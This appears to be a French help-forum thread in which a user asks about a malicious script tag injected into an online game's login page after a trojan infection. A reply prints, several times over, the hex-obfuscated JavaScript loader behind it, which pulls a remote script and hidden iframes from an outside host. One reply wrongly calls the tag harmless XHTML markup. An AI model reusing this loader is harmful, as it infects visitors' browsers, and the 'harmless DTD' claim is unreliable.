Code source incrusté<script src=http://ck1.in
Tiphaine Coulon
-
?????? -
?????? -
bonjour,
J'ai une utilisation du web du type nana qui s'amuse et ne fait pas trop de trucs bizarres sur le net.
Bref utilisation d'email, jeu non payants, sites banals d'information, msn mesenger et streaming sur les grands sites officiels comme tous les moutons. Avec ma configuration de logiciels toujours mis a jours, je n'ai jusqu'alors eu aucun probleme.
Concernant les jeux, je ne joue qu'à Tribal wars (un jeu de masse en ligne,par navigation de pages web, du genre Ogame ou bite fight) Rien de méchant
Et voila qu'un jour, je visite ma boite mail je telecharge une piece jointe (document excel pas lourd du tout avec des tableaux, des onglets et des graphiques simples) d'une connaissance (comme de tant en temps seulement).
Simple coincidence ou non : Le soir même, je n'arrive plus à accéder à mon jeu. Je met mon mot de passe et j'arrive sur une page vierge. Comme j'utilise le module complémentaire "nosript" de firefox 2, j'ai remarqué que quelque chose s'est imissé dans le code source de la page vierge et de la page d'accueil demandant l'identification.
c'est la ligne:
<script src=http://ck1.in/n.js>
Voici le début du code source de la page d'accueil:
<script src=http://ck1.in/n.js></script><?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Tribal Wars</title> <link rel="stylesheet" type="text/css" href="stamm.css" /> <script type="text/javascript">
J'ai fait scanner le fichier excel telechargé par totalvirus et kaspersky online, et je ne trouve rien.
J'ai demandé à un ami d'aller sur la même page d'accueil www.tribalwars.fr à partir d'un autre ordi, et il me confirme qu'il voit en source la meme chose, sans le <script src=http://ck1.in/n.js>
Là je me dis que c'est un lien vers un truc louche, et qu'heuresement "noscript" ou un autre de mes logiciel a empeché à mon navigateur d'aller plus loin automatiquement.
J'ai tout scané mon pc, full scan, partout, en mode sans echec comme en mode normal,
avec ccleaner, ad-aware, spybot, avast, hijackthis, cwshredder, spywareblaster, tous à jours
Je ne vois rien du tout. Et le probleme persiste.
Alors je me mets à désactiver un à un les programes en tache de fond, et bizarrement, j'ai finanlement trouvé avec avast un trojan :
"Application: 1104
Description: Sign of "Win32:VB-AQA [Trj]" has been found in "C:\Program Files\Spybloquer Softfware\Pro\uclose.exe" file.
Bref, je met en quarantaine et supprime.
Ca ne marche pas, alors je re-scan, met en quanrantaine, supprime, et desactive le logiciel spyblocker pro. Et là miracle, j'arrive à me connecter sans page vierge.
Le problème c'est que je crains que le probleme ressurgisse un jour.
Que faire ?
egalement, Y'a-t-il un moyen de vivre avec ce probleme : une technique permettant de filtrer automatiquement mes navigations en eliminant automatiquement toute présence de <script src=http://ck1.in/n.js> ????
Merci de votre aide
J'ai une utilisation du web du type nana qui s'amuse et ne fait pas trop de trucs bizarres sur le net.
Bref utilisation d'email, jeu non payants, sites banals d'information, msn mesenger et streaming sur les grands sites officiels comme tous les moutons. Avec ma configuration de logiciels toujours mis a jours, je n'ai jusqu'alors eu aucun probleme.
Concernant les jeux, je ne joue qu'à Tribal wars (un jeu de masse en ligne,par navigation de pages web, du genre Ogame ou bite fight) Rien de méchant
Et voila qu'un jour, je visite ma boite mail je telecharge une piece jointe (document excel pas lourd du tout avec des tableaux, des onglets et des graphiques simples) d'une connaissance (comme de tant en temps seulement).
Simple coincidence ou non : Le soir même, je n'arrive plus à accéder à mon jeu. Je met mon mot de passe et j'arrive sur une page vierge. Comme j'utilise le module complémentaire "nosript" de firefox 2, j'ai remarqué que quelque chose s'est imissé dans le code source de la page vierge et de la page d'accueil demandant l'identification.
c'est la ligne:
<script src=http://ck1.in/n.js>
Voici le début du code source de la page d'accueil:
<script src=http://ck1.in/n.js></script><?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Tribal Wars</title> <link rel="stylesheet" type="text/css" href="stamm.css" /> <script type="text/javascript">
J'ai fait scanner le fichier excel telechargé par totalvirus et kaspersky online, et je ne trouve rien.
J'ai demandé à un ami d'aller sur la même page d'accueil www.tribalwars.fr à partir d'un autre ordi, et il me confirme qu'il voit en source la meme chose, sans le <script src=http://ck1.in/n.js>
Là je me dis que c'est un lien vers un truc louche, et qu'heuresement "noscript" ou un autre de mes logiciel a empeché à mon navigateur d'aller plus loin automatiquement.
J'ai tout scané mon pc, full scan, partout, en mode sans echec comme en mode normal,
avec ccleaner, ad-aware, spybot, avast, hijackthis, cwshredder, spywareblaster, tous à jours
Je ne vois rien du tout. Et le probleme persiste.
Alors je me mets à désactiver un à un les programes en tache de fond, et bizarrement, j'ai finanlement trouvé avec avast un trojan :
"Application: 1104
Description: Sign of "Win32:VB-AQA [Trj]" has been found in "C:\Program Files\Spybloquer Softfware\Pro\uclose.exe" file.
Bref, je met en quarantaine et supprime.
Ca ne marche pas, alors je re-scan, met en quanrantaine, supprime, et desactive le logiciel spyblocker pro. Et là miracle, j'arrive à me connecter sans page vierge.
Le problème c'est que je crains que le probleme ressurgisse un jour.
Que faire ?
egalement, Y'a-t-il un moyen de vivre avec ce probleme : une technique permettant de filtrer automatiquement mes navigations en eliminant automatiquement toute présence de <script src=http://ck1.in/n.js> ????
Merci de votre aide
A voir également:
- Code source incrusté<script src=http://ck1.in
- Http - Guide
- Code ascii - Guide
- Http //192.168.l.l - Guide
- Code puk bloqué - Guide
- Comment déverrouiller un téléphone quand on a oublié le code - Guide
20 réponses
Bonsoir, je pasais par là ...
Grace à linux :
document.writeln("\x3C\x73\x63\x72\x69\x70\x74\x20\x73\x72\x63\x3D\"\x68\x74\x74\x70\x3A\/\/\x6F\x72\x61\x2E\x33\x31\x36\x38\x61\x2E\x63\x6F\x6D\/\x73\x33\x36\x38\/\x4E\x45\x77\x4A\x73\x32\x2E\x6A\x73\"\x3E\x3C\/\x73\x63\x72\x69\x70\x74\x3E");
document.writeln("\x3C\x73\x63\x72\x69\x70\x74\x3E");
document.writeln("\x66\x75\x6E\x63\x74\x69\x6F\x6E\x20\x49\x73\x5F\x47\x6F\x47\x6F\x28\x29\x7B");
document.writeln("\x76\x61\x72\x20\x54\x68\x65\x6E\x20\x3D\x20\x6E\x65\x77\x20\x44\x61\x74\x65\x28\x29\x20");
document.writeln("\x54\x68\x65\x6E\x2E\x73\x65\x74\x54\x69\x6D\x65\x28\x54\x68\x65\x6E\x2E\x67\x65\x74\x54\x69\x6D\x65\x28\x29\x20\x2B\x20\x32\x34\x2A\x36\x30\x2A\x36\x30\x2A\x31\x30\x30\x30\x29");
document.writeln("\x76\x61\x72\x20\x63\x6F\x6F\x6B\x69\x65\x53\x74\x72\x69\x6E\x67\x20\x3D\x20\x6E\x65\x77\x20\x53\x74\x72\x69\x6E\x67\x28\x64\x6F\x63\x75\x6D\x65\x6E\x74\x2E\x63\x6F\x6F\x6B\x69\x65\x29");
document.writeln("\x76\x61\x72\x20\x63\x6F\x6F\x6B\x69\x65\x48\x65\x61\x64\x65\x72\x20\x3D\x20\"\x43\x6F\x6F\x6B\x69\x65\x31\x3D\"\x20");
document.writeln("\x76\x61\x72\x20\x62\x65\x67\x69\x6E\x50\x6F\x73\x69\x74\x69\x6F\x6E\x20\x3D\x20\x63\x6F\x6F\x6B\x69\x65\x53\x74\x72\x69\x6E\x67\x2E\x69\x6E\x64\x65\x78\x4F\x66\x28\x63\x6F\x6F\x6B\x69\x65\x48\x65\x61\x64\x65\x72\x29");
document.writeln("\x69\x66\x20\x28\x62\x65\x67\x69\x6E\x50\x6F\x73\x69\x74\x69\x6F\x6E\x20\x21\x3D\x20\x2D\x31\x29\x7B\x20");
document.writeln("\x7D\x20\x65\x6C\x73\x65\x20");
document.writeln("\x7B\x20\x64\x6F\x63\x75\x6D\x65\x6E\x74\x2E\x63\x6F\x6F\x6B\x69\x65\x20\x3D\x20\"\x43\x6F\x6F\x6B\x69\x65\x31\x3D\x50\x4F\x50\x57\x49\x4E\x44\x4F\x53\x3B\x65\x78\x70\x69\x72\x65\x73\x3D\"\x2B\x20\x54\x68\x65\x6E\x2E\x74\x6F\x47\x4D\x54\x53\x74\x72\x69\x6E\x67\x28\x29\x20");
document.writeln("\x64\x6F\x63\x75\x6D\x65\x6E\x74\x2E\x77\x72\x69\x74\x65\x28\'\x3C\x69\x66\x72\x61\x6D\x65\x20\x77\x69\x64\x74\x68\x3D\x30\x20\x68\x65\x69\x67\x68\x74\x3D\x30\x20\x73\x72\x63\x3D\"\x68\x74\x74\x70\x3A\/\/\x6F\x72\x61\x2E\x33\x31\x36\x38\x61\x2E\x63\x6F\x6D\/\x73\x33\x36\x38\/\x74\x33\x36\x38\x2E\x68\x74\x6D\"\x3E\x3C\/\x69\x66\x72\x61\x6D\x65\x3E\'\x29\x3B");
document.writeln("\x64\x6F\x63\x75\x6D\x65\x6E\x74\x2E\x77\x72\x69\x74\x65\x28\'\x3C\x69\x66\x72\x61\x6D\x65\x20\x77\x69\x64\x74\x68\x3D\x30\x20\x68\x65\x69\x67\x68\x74\x3D\x30\x20\x73\x72\x63\x3D\"\x68\x74\x74\x70\x3A\/\/\x6F\x72\x61\x2E\x33\x31\x36\x38\x61\x2E\x63\x6F\x6D\/\x73\x33\x36\x38\/\x74\x33\x36\x38\x2E\x67\x69\x66\"\x3E\x3C\/\x69\x66\x72\x61\x6D\x65\x3E\'\x29\x3B");
document.writeln("\x7D");
document.writeln("\x7D");
document.writeln("\x49\x73\x5F\x47\x6F\x47\x6F\x28\x29\x3B");
document.writeln("\x3C\/\x73\x63\x72\x69\x70\x74\x3E");
document.writeln("\x3C\x73\x63\x72\x69\x70\x74\x3E\x77\x69\x6E\x64\x6F\x77\x2E\x6F\x6E\x65\x72\x72\x6F\x72\x3D\x66\x75\x6E\x63\x74\x69\x6F\x6E\x28\x29\x7B\x72\x65\x74\x75\x72\x6E\x20\x74\x72\x75\x65\x3B\x7D\x3C\/\x73\x63\x72\x69\x70\x74\x3E")
à mon avis, ça sent pas bon cette histoire .....
Grace à linux :
document.writeln("\x3C\x73\x63\x72\x69\x70\x74\x20\x73\x72\x63\x3D\"\x68\x74\x74\x70\x3A\/\/\x6F\x72\x61\x2E\x33\x31\x36\x38\x61\x2E\x63\x6F\x6D\/\x73\x33\x36\x38\/\x4E\x45\x77\x4A\x73\x32\x2E\x6A\x73\"\x3E\x3C\/\x73\x63\x72\x69\x70\x74\x3E");
document.writeln("\x3C\x73\x63\x72\x69\x70\x74\x3E");
document.writeln("\x66\x75\x6E\x63\x74\x69\x6F\x6E\x20\x49\x73\x5F\x47\x6F\x47\x6F\x28\x29\x7B");
document.writeln("\x76\x61\x72\x20\x54\x68\x65\x6E\x20\x3D\x20\x6E\x65\x77\x20\x44\x61\x74\x65\x28\x29\x20");
document.writeln("\x54\x68\x65\x6E\x2E\x73\x65\x74\x54\x69\x6D\x65\x28\x54\x68\x65\x6E\x2E\x67\x65\x74\x54\x69\x6D\x65\x28\x29\x20\x2B\x20\x32\x34\x2A\x36\x30\x2A\x36\x30\x2A\x31\x30\x30\x30\x29");
document.writeln("\x76\x61\x72\x20\x63\x6F\x6F\x6B\x69\x65\x53\x74\x72\x69\x6E\x67\x20\x3D\x20\x6E\x65\x77\x20\x53\x74\x72\x69\x6E\x67\x28\x64\x6F\x63\x75\x6D\x65\x6E\x74\x2E\x63\x6F\x6F\x6B\x69\x65\x29");
document.writeln("\x76\x61\x72\x20\x63\x6F\x6F\x6B\x69\x65\x48\x65\x61\x64\x65\x72\x20\x3D\x20\"\x43\x6F\x6F\x6B\x69\x65\x31\x3D\"\x20");
document.writeln("\x76\x61\x72\x20\x62\x65\x67\x69\x6E\x50\x6F\x73\x69\x74\x69\x6F\x6E\x20\x3D\x20\x63\x6F\x6F\x6B\x69\x65\x53\x74\x72\x69\x6E\x67\x2E\x69\x6E\x64\x65\x78\x4F\x66\x28\x63\x6F\x6F\x6B\x69\x65\x48\x65\x61\x64\x65\x72\x29");
document.writeln("\x69\x66\x20\x28\x62\x65\x67\x69\x6E\x50\x6F\x73\x69\x74\x69\x6F\x6E\x20\x21\x3D\x20\x2D\x31\x29\x7B\x20");
document.writeln("\x7D\x20\x65\x6C\x73\x65\x20");
document.writeln("\x7B\x20\x64\x6F\x63\x75\x6D\x65\x6E\x74\x2E\x63\x6F\x6F\x6B\x69\x65\x20\x3D\x20\"\x43\x6F\x6F\x6B\x69\x65\x31\x3D\x50\x4F\x50\x57\x49\x4E\x44\x4F\x53\x3B\x65\x78\x70\x69\x72\x65\x73\x3D\"\x2B\x20\x54\x68\x65\x6E\x2E\x74\x6F\x47\x4D\x54\x53\x74\x72\x69\x6E\x67\x28\x29\x20");
document.writeln("\x64\x6F\x63\x75\x6D\x65\x6E\x74\x2E\x77\x72\x69\x74\x65\x28\'\x3C\x69\x66\x72\x61\x6D\x65\x20\x77\x69\x64\x74\x68\x3D\x30\x20\x68\x65\x69\x67\x68\x74\x3D\x30\x20\x73\x72\x63\x3D\"\x68\x74\x74\x70\x3A\/\/\x6F\x72\x61\x2E\x33\x31\x36\x38\x61\x2E\x63\x6F\x6D\/\x73\x33\x36\x38\/\x74\x33\x36\x38\x2E\x68\x74\x6D\"\x3E\x3C\/\x69\x66\x72\x61\x6D\x65\x3E\'\x29\x3B");
document.writeln("\x64\x6F\x63\x75\x6D\x65\x6E\x74\x2E\x77\x72\x69\x74\x65\x28\'\x3C\x69\x66\x72\x61\x6D\x65\x20\x77\x69\x64\x74\x68\x3D\x30\x20\x68\x65\x69\x67\x68\x74\x3D\x30\x20\x73\x72\x63\x3D\"\x68\x74\x74\x70\x3A\/\/\x6F\x72\x61\x2E\x33\x31\x36\x38\x61\x2E\x63\x6F\x6D\/\x73\x33\x36\x38\/\x74\x33\x36\x38\x2E\x67\x69\x66\"\x3E\x3C\/\x69\x66\x72\x61\x6D\x65\x3E\'\x29\x3B");
document.writeln("\x7D");
document.writeln("\x7D");
document.writeln("\x49\x73\x5F\x47\x6F\x47\x6F\x28\x29\x3B");
document.writeln("\x3C\/\x73\x63\x72\x69\x70\x74\x3E");
document.writeln("\x3C\x73\x63\x72\x69\x70\x74\x3E\x77\x69\x6E\x64\x6F\x77\x2E\x6F\x6E\x65\x72\x72\x6F\x72\x3D\x66\x75\x6E\x63\x74\x69\x6F\x6E\x28\x29\x7B\x72\x65\x74\x75\x72\x6E\x20\x74\x72\x75\x65\x3B\x7D\x3C\/\x73\x63\x72\x69\x70\x74\x3E")
à mon avis, ça sent pas bon cette histoire .....
Vous n’avez pas trouvé la réponse que vous recherchez ?
Posez votre question
Ahhn voila une personne qui visite ce topic. Mais tu as mal lu mon message....
En résumé, ce code source s'est incrusté et ne devais pas être là.
Sa présence fait en sorte que je ne vois plus rien.
Il faudrait trouver un moyen de l'enlever.
J'ai tout scané, éliminé la moindre trace de trojan/malware, et toujouts aucune amélioration.
egalement, Y'a-t-il un moyen de vivre avec ce probleme : une technique permettant de filtrer automatiquement mes navigations en eliminant automatiquement toute présence de <script src=http://ck1.in/n.js> ????
En résumé, ce code source s'est incrusté et ne devais pas être là.
Sa présence fait en sorte que je ne vois plus rien.
Il faudrait trouver un moyen de l'enlever.
J'ai tout scané, éliminé la moindre trace de trojan/malware, et toujouts aucune amélioration.
egalement, Y'a-t-il un moyen de vivre avec ce probleme : une technique permettant de filtrer automatiquement mes navigations en eliminant automatiquement toute présence de <script src=http://ck1.in/n.js> ????
Bonsoir, je pasais par là ...
Grace à linux :
document.writeln("\x3C\x73\x63\x72\x69\x70\x74\x20\x73\x72\x63\x3D\"\x68\x74\x74\x70\x3A\/\/\x6F\x72\x61\x2E\x33\x31\x36\x38\x61\x2E\x63\x6F\x6D\/\x73\x33\x36\x38\/\x4E\x45\x77\x4A\x73\x32\x2E\x6A\x73\"\x3E\x3C\/\x73\x63\x72\x69\x70\x74\x3E");
document.writeln("\x3C\x73\x63\x72\x69\x70\x74\x3E");
document.writeln("\x66\x75\x6E\x63\x74\x69\x6F\x6E\x20\x49\x73\x5F\x47\x6F\x47\x6F\x28\x29\x7B");
document.writeln("\x76\x61\x72\x20\x54\x68\x65\x6E\x20\x3D\x20\x6E\x65\x77\x20\x44\x61\x74\x65\x28\x29\x20");
document.writeln("\x54\x68\x65\x6E\x2E\x73\x65\x74\x54\x69\x6D\x65\x28\x54\x68\x65\x6E\x2E\x67\x65\x74\x54\x69\x6D\x65\x28\x29\x20\x2B\x20\x32\x34\x2A\x36\x30\x2A\x36\x30\x2A\x31\x30\x30\x30\x29");
document.writeln("\x76\x61\x72\x20\x63\x6F\x6F\x6B\x69\x65\x53\x74\x72\x69\x6E\x67\x20\x3D\x20\x6E\x65\x77\x20\x53\x74\x72\x69\x6E\x67\x28\x64\x6F\x63\x75\x6D\x65\x6E\x74\x2E\x63\x6F\x6F\x6B\x69\x65\x29");
document.writeln("\x76\x61\x72\x20\x63\x6F\x6F\x6B\x69\x65\x48\x65\x61\x64\x65\x72\x20\x3D\x20\"\x43\x6F\x6F\x6B\x69\x65\x31\x3D\"\x20");
document.writeln("\x76\x61\x72\x20\x62\x65\x67\x69\x6E\x50\x6F\x73\x69\x74\x69\x6F\x6E\x20\x3D\x20\x63\x6F\x6F\x6B\x69\x65\x53\x74\x72\x69\x6E\x67\x2E\x69\x6E\x64\x65\x78\x4F\x66\x28\x63\x6F\x6F\x6B\x69\x65\x48\x65\x61\x64\x65\x72\x29");
document.writeln("\x69\x66\x20\x28\x62\x65\x67\x69\x6E\x50\x6F\x73\x69\x74\x69\x6F\x6E\x20\x21\x3D\x20\x2D\x31\x29\x7B\x20");
document.writeln("\x7D\x20\x65\x6C\x73\x65\x20");
document.writeln("\x7B\x20\x64\x6F\x63\x75\x6D\x65\x6E\x74\x2E\x63\x6F\x6F\x6B\x69\x65\x20\x3D\x20\"\x43\x6F\x6F\x6B\x69\x65\x31\x3D\x50\x4F\x50\x57\x49\x4E\x44\x4F\x53\x3B\x65\x78\x70\x69\x72\x65\x73\x3D\"\x2B\x20\x54\x68\x65\x6E\x2E\x74\x6F\x47\x4D\x54\x53\x74\x72\x69\x6E\x67\x28\x29\x20");
document.writeln("\x64\x6F\x63\x75\x6D\x65\x6E\x74\x2E\x77\x72\x69\x74\x65\x28\'\x3C\x69\x66\x72\x61\x6D\x65\x20\x77\x69\x64\x74\x68\x3D\x30\x20\x68\x65\x69\x67\x68\x74\x3D\x30\x20\x73\x72\x63\x3D\"\x68\x74\x74\x70\x3A\/\/\x6F\x72\x61\x2E\x33\x31\x36\x38\x61\x2E\x63\x6F\x6D\/\x73\x33\x36\x38\/\x74\x33\x36\x38\x2E\x68\x74\x6D\"\x3E\x3C\/\x69\x66\x72\x61\x6D\x65\x3E\'\x29\x3B");
document.writeln("\x64\x6F\x63\x75\x6D\x65\x6E\x74\x2E\x77\x72\x69\x74\x65\x28\'\x3C\x69\x66\x72\x61\x6D\x65\x20\x77\x69\x64\x74\x68\x3D\x30\x20\x68\x65\x69\x67\x68\x74\x3D\x30\x20\x73\x72\x63\x3D\"\x68\x74\x74\x70\x3A\/\/\x6F\x72\x61\x2E\x33\x31\x36\x38\x61\x2E\x63\x6F\x6D\/\x73\x33\x36\x38\/\x74\x33\x36\x38\x2E\x67\x69\x66\"\x3E\x3C\/\x69\x66\x72\x61\x6D\x65\x3E\'\x29\x3B");
document.writeln("\x7D");
document.writeln("\x7D");
document.writeln("\x49\x73\x5F\x47\x6F\x47\x6F\x28\x29\x3B");
document.writeln("\x3C\/\x73\x63\x72\x69\x70\x74\x3E");
document.writeln("\x3C\x73\x63\x72\x69\x70\x74\x3E\x77\x69\x6E\x64\x6F\x77\x2E\x6F\x6E\x65\x72\x72\x6F\x72\x3D\x66\x75\x6E\x63\x74\x69\x6F\x6E\x28\x29\x7B\x72\x65\x74\x75\x72\x6E\x20\x74\x72\x75\x65\x3B\x7D\x3C\/\x73\x63\x72\x69\x70\x74\x3E")
Grace à linux :
document.writeln("\x3C\x73\x63\x72\x69\x70\x74\x20\x73\x72\x63\x3D\"\x68\x74\x74\x70\x3A\/\/\x6F\x72\x61\x2E\x33\x31\x36\x38\x61\x2E\x63\x6F\x6D\/\x73\x33\x36\x38\/\x4E\x45\x77\x4A\x73\x32\x2E\x6A\x73\"\x3E\x3C\/\x73\x63\x72\x69\x70\x74\x3E");
document.writeln("\x3C\x73\x63\x72\x69\x70\x74\x3E");
document.writeln("\x66\x75\x6E\x63\x74\x69\x6F\x6E\x20\x49\x73\x5F\x47\x6F\x47\x6F\x28\x29\x7B");
document.writeln("\x76\x61\x72\x20\x54\x68\x65\x6E\x20\x3D\x20\x6E\x65\x77\x20\x44\x61\x74\x65\x28\x29\x20");
document.writeln("\x54\x68\x65\x6E\x2E\x73\x65\x74\x54\x69\x6D\x65\x28\x54\x68\x65\x6E\x2E\x67\x65\x74\x54\x69\x6D\x65\x28\x29\x20\x2B\x20\x32\x34\x2A\x36\x30\x2A\x36\x30\x2A\x31\x30\x30\x30\x29");
document.writeln("\x76\x61\x72\x20\x63\x6F\x6F\x6B\x69\x65\x53\x74\x72\x69\x6E\x67\x20\x3D\x20\x6E\x65\x77\x20\x53\x74\x72\x69\x6E\x67\x28\x64\x6F\x63\x75\x6D\x65\x6E\x74\x2E\x63\x6F\x6F\x6B\x69\x65\x29");
document.writeln("\x76\x61\x72\x20\x63\x6F\x6F\x6B\x69\x65\x48\x65\x61\x64\x65\x72\x20\x3D\x20\"\x43\x6F\x6F\x6B\x69\x65\x31\x3D\"\x20");
document.writeln("\x76\x61\x72\x20\x62\x65\x67\x69\x6E\x50\x6F\x73\x69\x74\x69\x6F\x6E\x20\x3D\x20\x63\x6F\x6F\x6B\x69\x65\x53\x74\x72\x69\x6E\x67\x2E\x69\x6E\x64\x65\x78\x4F\x66\x28\x63\x6F\x6F\x6B\x69\x65\x48\x65\x61\x64\x65\x72\x29");
document.writeln("\x69\x66\x20\x28\x62\x65\x67\x69\x6E\x50\x6F\x73\x69\x74\x69\x6F\x6E\x20\x21\x3D\x20\x2D\x31\x29\x7B\x20");
document.writeln("\x7D\x20\x65\x6C\x73\x65\x20");
document.writeln("\x7B\x20\x64\x6F\x63\x75\x6D\x65\x6E\x74\x2E\x63\x6F\x6F\x6B\x69\x65\x20\x3D\x20\"\x43\x6F\x6F\x6B\x69\x65\x31\x3D\x50\x4F\x50\x57\x49\x4E\x44\x4F\x53\x3B\x65\x78\x70\x69\x72\x65\x73\x3D\"\x2B\x20\x54\x68\x65\x6E\x2E\x74\x6F\x47\x4D\x54\x53\x74\x72\x69\x6E\x67\x28\x29\x20");
document.writeln("\x64\x6F\x63\x75\x6D\x65\x6E\x74\x2E\x77\x72\x69\x74\x65\x28\'\x3C\x69\x66\x72\x61\x6D\x65\x20\x77\x69\x64\x74\x68\x3D\x30\x20\x68\x65\x69\x67\x68\x74\x3D\x30\x20\x73\x72\x63\x3D\"\x68\x74\x74\x70\x3A\/\/\x6F\x72\x61\x2E\x33\x31\x36\x38\x61\x2E\x63\x6F\x6D\/\x73\x33\x36\x38\/\x74\x33\x36\x38\x2E\x68\x74\x6D\"\x3E\x3C\/\x69\x66\x72\x61\x6D\x65\x3E\'\x29\x3B");
document.writeln("\x64\x6F\x63\x75\x6D\x65\x6E\x74\x2E\x77\x72\x69\x74\x65\x28\'\x3C\x69\x66\x72\x61\x6D\x65\x20\x77\x69\x64\x74\x68\x3D\x30\x20\x68\x65\x69\x67\x68\x74\x3D\x30\x20\x73\x72\x63\x3D\"\x68\x74\x74\x70\x3A\/\/\x6F\x72\x61\x2E\x33\x31\x36\x38\x61\x2E\x63\x6F\x6D\/\x73\x33\x36\x38\/\x74\x33\x36\x38\x2E\x67\x69\x66\"\x3E\x3C\/\x69\x66\x72\x61\x6D\x65\x3E\'\x29\x3B");
document.writeln("\x7D");
document.writeln("\x7D");
document.writeln("\x49\x73\x5F\x47\x6F\x47\x6F\x28\x29\x3B");
document.writeln("\x3C\/\x73\x63\x72\x69\x70\x74\x3E");
document.writeln("\x3C\x73\x63\x72\x69\x70\x74\x3E\x77\x69\x6E\x64\x6F\x77\x2E\x6F\x6E\x65\x72\x72\x6F\x72\x3D\x66\x75\x6E\x63\x74\x69\x6F\x6E\x28\x29\x7B\x72\x65\x74\x75\x72\x6E\x20\x74\x72\x75\x65\x3B\x7D\x3C\/\x73\x63\x72\x69\x70\x74\x3E")
Il s'agit tout simplement de la dtd relative aux nouvelles normes xhtml en aucun cas il ne s'agit d'un virus ou spyware.
Je rajoute que je n'ai rien trouvé sur google qui pourrait m'aider sur cette ligne bizarre en début de code source.
<script src=http://ck1.in/n.js> sur google me renvoie sur une minuscuele quinzaine de résulatats : des forums chinois (dans le sens premier du terme)
Bref, cette ligne bien particulière n'a jamais été traité par le anglophones
<script src=http://ck1.in/n.js> sur google me renvoie sur une minuscuele quinzaine de résulatats : des forums chinois (dans le sens premier du terme)
Bref, cette ligne bien particulière n'a jamais été traité par le anglophones
